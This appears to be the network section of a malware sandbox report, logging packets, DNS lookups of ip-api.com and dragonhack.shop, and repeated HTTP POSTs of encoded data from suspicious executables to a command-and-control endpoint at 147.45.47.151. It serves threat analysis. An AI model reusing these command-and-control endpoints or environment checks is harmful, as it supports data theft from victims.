                                                                                          Dec 10, 2024 07:29:58.724920034 CET4991580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:58.725857019 CET4991780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:58.845242977 CET8049915147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:58.845263004 CET8049917147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:58.845324039 CET4991580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:58.845391035 CET4991780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:58.845568895 CET4991780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:58.964854956 CET8049917147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:59.194462061 CET4991780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:29:59.313909054 CET8049917147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:59.313940048 CET8049917147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:29:59.314013004 CET8049917147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:00.107903957 CET8049917147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:00.163024902 CET4991780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:00.340565920 CET8049917147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:00.381850004 CET4991780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:00.457098007 CET4991780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:00.457221031 CET4992380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:00.576742887 CET8049923147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:00.576989889 CET4992380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:00.577008963 CET8049917147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:00.577059031 CET4991780192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:00.577135086 CET4992380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:00.696543932 CET8049923147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:00.929562092 CET4992380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:01.049604893 CET8049923147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:01.049618959 CET8049923147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:01.049721956 CET8049923147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:01.664686918 CET4992880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:01.784135103 CET8049928147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:01.784235954 CET4992880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:01.784426928 CET4992880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:01.838671923 CET8049923147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:01.881961107 CET4992380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:01.903708935 CET8049928147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:02.072525978 CET8049923147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:02.116148949 CET4992380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:02.132056952 CET4992880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:02.192967892 CET4992380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:02.193181038 CET4993080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:02.251559019 CET8049928147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:02.251605034 CET8049928147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:02.312627077 CET8049930147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:02.312690973 CET8049923147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:02.312830925 CET4993080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:02.312832117 CET4992380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:02.312946081 CET4993080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:02.432188988 CET8049930147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:02.695750952 CET4993080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:02.815262079 CET8049930147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:02.815299988 CET8049930147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:02.815309048 CET8049930147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:03.054285049 CET8049928147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:03.100548029 CET4992880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:03.280560017 CET8049928147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:03.334901094 CET4992880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:03.575222015 CET8049930147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:03.616343021 CET4993080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:03.808585882 CET8049930147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:03.850548983 CET4993080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:03.930619955 CET4992880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:03.930687904 CET4993080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:03.930922985 CET4993580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:04.050278902 CET8049935147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:04.050544977 CET4993580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:04.050729036 CET4993580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:04.058655024 CET8049928147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:04.058666945 CET8049930147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:04.058723927 CET4992880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:04.058748960 CET4993080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:04.171653986 CET8049935147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:04.399494886 CET4993580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:04.518950939 CET8049935147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:04.518974066 CET8049935147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:04.518985033 CET8049935147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:05.311827898 CET8049935147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:05.366146088 CET4993580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:05.544393063 CET8049935147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:05.584883928 CET4993580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:05.659349918 CET4993580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:05.659765005 CET4994180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:05.779002905 CET8049941147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:05.779062986 CET4994180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:05.779212952 CET4994180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:05.779308081 CET8049935147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:05.779350996 CET4993580192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:05.898499966 CET8049941147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:06.169872999 CET4994180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:06.289434910 CET8049941147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:06.289449930 CET8049941147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:06.289458036 CET8049941147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:07.040911913 CET8049941147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:07.084920883 CET4994180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:07.276443958 CET8049941147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:07.319273949 CET4994180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:07.394640923 CET4994180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:07.394916058 CET4994380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:07.514156103 CET8049943147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:07.514317989 CET8049941147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:07.514420986 CET4994180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:07.514421940 CET4994380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:07.514744043 CET4994380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:07.634701967 CET8049943147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:07.873151064 CET4994380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:07.992609978 CET8049943147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:07.992625952 CET8049943147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:07.992638111 CET8049943147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:08.288898945 CET4994880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:08.408328056 CET8049948147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:08.408552885 CET4994880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:08.408587933 CET4994880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:08.527961969 CET8049948147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:08.756890059 CET4994880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:08.775341988 CET8049943147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:08.819374084 CET4994380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:08.876354933 CET8049948147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:08.876472950 CET8049948147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.008654118 CET8049943147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.053639889 CET4994380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:09.142422915 CET4994380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:09.142687082 CET4995080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:09.262108088 CET8049950147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.262166023 CET8049943147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.262356043 CET4995080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:09.262360096 CET4994380192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:09.262430906 CET4995080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:09.381777048 CET8049950147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.621140003 CET4995080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:09.670428991 CET8049948147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.725589037 CET4994880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:09.740601063 CET8049950147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.740616083 CET8049950147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.740626097 CET8049950147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.904508114 CET8049948147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:09.960021973 CET4994880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:10.522686958 CET8049950147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:10.569334030 CET4995080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:10.756448984 CET8049950147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:10.803623915 CET4995080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:10.928195000 CET4994880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:10.928261995 CET4995080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:10.928787947 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:11.048183918 CET8049948147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:11.048202991 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:11.048276901 CET4994880192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:11.048319101 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:11.048543930 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:11.048594952 CET8049950147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:11.048635960 CET4995080192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:11.167706966 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:11.397686005 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:11.517214060 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:11.517229080 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:11.517239094 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:12.311304092 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:12.366153955 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.548527002 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:12.600543022 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.676018000 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.676281929 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.795603037 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:12.795686960 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.795773029 CET8049956147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:12.795824051 CET4995680192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.796422958 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:12.915720940 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:13.173727036 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:13.293216944 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:13.293232918 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:13.293504000 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:14.060401917 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:14.116864920 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.292489052 CET8049961147.45.47.151192.168.2.8
                                                                                          Dec 10, 2024 07:30:14.335118055 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.410873890 CET4996180192.168.2.8147.45.47.151
                                                                                          Dec 10, 2024 07:30:14.411132097 CET4996780192.168.2.8147.45.47.151
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 07:27:43.657532930 CET | 62479 | 53 | 192.168.2.8 | 1.1.1.1
Dec 10, 2024 07:27:43.794605970 CET | 53 | 62479 | 1.1.1.1 | 192.168.2.8
Dec 10, 2024 07:27:46.640265942 CET | 59479 | 53 | 192.168.2.8 | 1.1.1.1
Dec 10, 2024 07:27:47.637411118 CET | 59479 | 53 | 192.168.2.8 | 1.1.1.1
Dec 10, 2024 07:27:48.378071070 CET | 53 | 59479 | 1.1.1.1 | 192.168.2.8
Dec 10, 2024 07:27:48.378078938 CET | 53 | 59479 | 1.1.1.1 | 192.168.2.8
Dec 10, 2024 07:28:09.857177973 CET | 50716 | 53 | 192.168.2.8 | 1.1.1.1
Dec 10, 2024 07:28:09.993597984 CET | 53 | 50716 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 07:27:43.657532930 CET | 192.168.2.8 | 1.1.1.1 | 0x3728 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:27:46.640265942 CET | 192.168.2.8 | 1.1.1.1 | 0xd6a4 | Standard query (0) | dragonhack.shop | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:27:47.637411118 CET | 192.168.2.8 | 1.1.1.1 | 0xd6a4 | Standard query (0) | dragonhack.shop | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:28:09.857177973 CET | 192.168.2.8 | 1.1.1.1 | 0xd369 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 07:27:43.794605970 CET | 1.1.1.1 | 192.168.2.8 | 0x3728 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:27:48.378071070 CET | 1.1.1.1 | 192.168.2.8 | 0xd6a4 | No error (0) | dragonhack.shop | | 91.149.219.45 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:27:48.378078938 CET | 1.1.1.1 | 192.168.2.8 | 0xd6a4 | No error (0) | dragonhack.shop | | 91.149.219.45 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 07:28:09.993597984 CET | 1.1.1.1 | 192.168.2.8 | 0xd369 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                                          • dragonhack.shop
                                                                                          • ip-api.com
                                                                                          • 147.45.47.151
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 208.95.112.1 | 80 | 7520 | C:\Users\user\Desktop\Wh2c6sgwRo.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:27:43.938498974 CET | 97 | OUT | GET /json/ HTTP/1.1
Content-Type: application/json
Host: ip-api.com
Connection: Keep-Alive
Dec 10, 2024 07:27:45.080363035 CET | 483 | IN | HTTP/1.1 200 OK
Date: Tue, 10 Dec 2024 06:27:44 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 306
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
                                                                                          Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.228"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49707 | 208.95.112.1 | 80 | 7768 | C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:27:52.956732035 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 10, 2024 07:27:54.123486042 CET | 175 | IN | HTTP/1.1 200 OK
Date: Tue, 10 Dec 2024 06:27:53 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49711 | 208.95.112.1 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:28:10.165043116 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 10, 2024 07:28:11.267781973 CET | 175 | IN | HTTP/1.1 200 OK
Date: Tue, 10 Dec 2024 06:28:10 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49713 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:28:12.698286057 CET | 343 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 147.45.47.151
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 10, 2024 07:28:13.058620930 CET | 344 | OUT |
Dec 10, 2024 07:28:13.959307909 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:28:13.983135939 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 Dec 2024 06:28:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Dec 10, 2024 07:28:13.983175039 CET | 358 | IN |
Dec 10, 2024 07:28:14.045324087 CET | 319 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 147.45.47.151
Content-Length: 384
Expect: 100-continue
Dec 10, 2024 07:28:14.426491976 CET | 384 | OUT |
                                                                                          Dec 10, 2024 07:28:14.447038889 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:14.833616018 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          4 | 192.168.2.8 | 49714 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:14.339091063 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:14.908617020 CET | 2512 | OUT | Data Raw: (encoded payload)
                                                                                          Dec 10, 2024 07:28:15.574578047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:15.809057951 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          5 | 192.168.2.8 | 49715 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:15.465962887 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1564
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:15.832197905 CET | 1564 | OUT | Data Raw: (encoded payload)
                                                                                          Dec 10, 2024 07:28:16.725687981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:16.965573072 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          6 | 192.168.2.8 | 49718 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:16.191601992 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:16.551209927 CET | 2504 | OUT | Data Raw: (encoded payload)
                                                                                          Dec 10, 2024 07:28:17.452816963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:17.685051918 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          7 | 192.168.2.8 | 49720 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:18.506297112 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:18.851480007 CET | 2512 | OUT | Data Raw: (encoded payload)
                                                                                          Dec 10, 2024 07:28:19.760482073 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:19.993072033 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          8 | 192.168.2.8 | 49722 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:21.919303894 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
